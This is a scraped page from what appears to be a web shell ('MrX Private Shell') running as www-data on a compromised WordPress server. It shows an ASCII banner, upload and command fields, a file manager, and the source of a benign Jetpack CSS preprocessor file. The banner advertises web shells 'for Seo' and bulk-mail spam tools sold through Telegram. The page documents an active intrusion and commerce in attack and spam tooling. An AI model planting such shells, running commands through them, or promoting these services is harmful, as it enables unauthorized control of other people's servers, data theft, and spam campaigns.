__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.52: ~ $
<?php // phpcs:ignore WordPress.Files.FileName.InvalidClassFileName

/**
 * CSS preprocessor registration.
 *
 * To add a new preprocessor (or replace an existing one), hook into the
 * jetpack_custom_css_preprocessors filter and add an entry to the array
 * that is passed in.
 *
 * Format is:
 * $preprocessors[ UNIQUE_KEY ] => array( 'name' => 'Processor name', 'callback' => [processing function] );
 *
 * The callback function accepts a single string argument (non-CSS markup) and returns a string (CSS).
 *
 * @param array $preprocessors The list of preprocessors added thus far.
 * @return array
 */
function jetpack_register_css_preprocessors( $preprocessors ) {
	$preprocessors['less'] = array(
		'name'     => 'LESS',
		'callback' => 'jetpack_less_css_preprocess',
	);

	$preprocessors['sass'] = array(
		'name'     => 'Sass (SCSS Syntax)',
		'callback' => 'jetpack_sass_css_preprocess',
	);

	return $preprocessors;
}

add_filter( 'jetpack_custom_css_preprocessors', 'jetpack_register_css_preprocessors' );

/**
 * Compile less prepocessors?
 *
 * @param string $less - less.
 */
function jetpack_less_css_preprocess( $less ) {
	require_once __DIR__ . '/preprocessors/lessc.inc.php';

	$compiler = new lessc();

	// Don't try to load from the filesystem.
	$compiler->setImportDir( array() );

	try {
		return $compiler->compile( $less );
	} catch ( Exception $e ) {
		return $less;
	}
}

/**
 * Compile sass prepocessors?
 *
 * @param string $sass - sass.
 */
function jetpack_sass_css_preprocess( $sass ) {
	$compiler = new ScssPhp\ScssPhp\Compiler();

	// Don't try to load from the filesystem.
	$compiler->setImportPaths( array() );

	try {
		return $compiler->compileString( $sass )->getCss();
	} catch ( Exception $e ) {
		return $sass;
	}
}

Filemanager

Name Type Size Permission Actions
css Folder 0755
js Folder 0755
preprocessors Folder 0755
preprocessors.php File 1.72 KB 0644
Filemanager